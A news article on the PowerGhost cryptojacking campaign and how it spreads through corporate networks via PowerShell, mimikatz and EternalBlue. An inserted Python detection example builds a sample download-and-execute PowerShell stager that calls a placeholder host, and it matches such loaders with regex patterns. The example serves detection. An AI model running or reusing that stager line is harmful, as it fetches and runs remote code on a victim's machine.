Researchers have uncovered a cryptojacking campaign that looks to spread across infected networks to ensure as much mining profit as possible.
A new form of cryptocurrency-mining malware is targeting corporate networks across the world, employing a combination of PowerShell and EternalBlue to stealthily spread.
Dubbed PowerGhost, the fileless malware can secretly embed itself on a single system on a network then spread to other PCs and servers across organisations.
The cryptojacker has been uncovered by researchers at security company Kaspersky Lab, who detected it on corporate networks across the globe, with the largest concentration of infections in India, Brazil, Colombia, and Turkey. PowerGhost has also been detected across Europe and North America.
Cryptocurrency mining malware secretly uses the power of infected systems to mine for cryptocurrency, which is sent to the attackers’ wallet. The more machines that are infected, the more illicit profits the attackers can make.
Infections begin with the use of exploits or remote administration tools such as Windows Management Instrumentation. PowerGhost also uses fileless techniques to discreetly go about its business and ensure it isn’t detected on the network.
By adopting this tactic, the PowerGhost miner isn’t stored directly on the hard drive of the infected machine, making it harder to detect.
PowerGhost itself is an obfuscated PowerShell script which contains add-on modules for the miner’s operation such as mimikatz, which helps it obtain account credentials of infected machines, as well as a shellcode for deploying the notorious EternalBlue exploit to spread around the network.
EternalBlue is the leaked NSA hacking tool which went on to power the WannaCry and NotPetya attacks, and it’s still being used by crooks over a year later.
After one machine is infected with PowerGhost, EternalBlue can spread it around the rest of the network; with the aid of mimikatz it can then steal credentials, which aids its spread further, and it can escalate privileges using CVE-2018-8120.
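As an added illustration (not code from the article or from Kaspersky's report), the following Python scores constructed process-creation events for the tradecraft described above: PowerShell launched through the WMI provider host with a hidden-window, base64-encoded command that downloads and runs a script in memory rather than from disk. The event field names, the sample stager and the placeholder host are this example's own assumptions, not a real telemetry schema.

```python
import base64
import re

# Constructed demo payload: an in-memory download-and-execute stager of the kind a
# fileless PowerShell loader uses (the host is an obvious placeholder, not a real IoC).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p.ps1')"

def encode_command(script):
    """Build the -EncodedCommand form PowerShell expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events; field names are this illustration's own.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + encode_command(STAGER)},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# -e, -ec, -enc and -EncodedCommand are all accepted prefixes of the same switch.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
FILELESS_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|FromBase64String", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def score_event(ev):
    """List the reasons an event looks like a WMI-launched fileless PowerShell loader."""
    reasons = []
    is_ps = ev["image"].lower().endswith("powershell.exe")
    if is_ps and ev["parent"].lower().endswith("wmiprvse.exe"):
        reasons.append("powershell spawned by the WMI provider host (remote WMI execution)")
    if is_ps and re.search(r"-w(?:indowstyle)?\s+hidden", ev["cmdline"], re.I):
        reasons.append("hidden window")
    script = decode_encoded_command(ev["cmdline"])
    if script is not None:
        reasons.append("encoded command line")
        if FILELESS_RE.search(script):
            reasons.append("decoded script downloads and executes in memory (fileless)")
    return reasons

def find_suspicious(events):
    """Return (index, reasons) for every event with at least one indicator."""
    return [(i, r) for i, r in ((i, score_event(ev)) for i, ev in enumerate(events)) if r]
```

Run over real telemetry, the same checks map to Sysmon Event ID 1 or Windows Security Event 4688 fields (parent image, image, command line), with PowerShell script block logging supplying the decoded script directly.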
Once PowerGhost is embedded onto machines, it can perform its task of mining for cryptocurrency — and detection rates for the malware suggest that those behind it are particularly keen to compromise corporate networks in order to make as much money as quickly as possible.
“PowerGhost raises new concerns about crypto-mining software. The miner we examined indicates that targeting consumers is not enough for cybercriminals anymore – threat actors are now turning their attention to enterprises too. Crypto-currency mining is set to become a huge threat to the business community,” said David Emm, principal security researcher at Kaspersky Lab.
Researchers note that one version of PowerGhost can also be used for conducting DDoS attacks, something which those behind the malware are likely to be using as an additional means of income.
Cryptocurrency mining malware has risen to become one of the most popular means of cybercriminals making money, even surpassing ransomware when it comes to turning a profit.
To avoid corporate networks falling victim to mining malware, researchers recommend that software is kept patched and up to date, so that miners cannot exploit the known vulnerabilities behind tools like EternalBlue.
Organisations are also urged not to overlook less obvious targets for attacks such as queue management systems, POS terminals, and vending machines: cryptojackers don't need much power to operate, so they can easily take advantage of these often-forgotten, low-powered systems.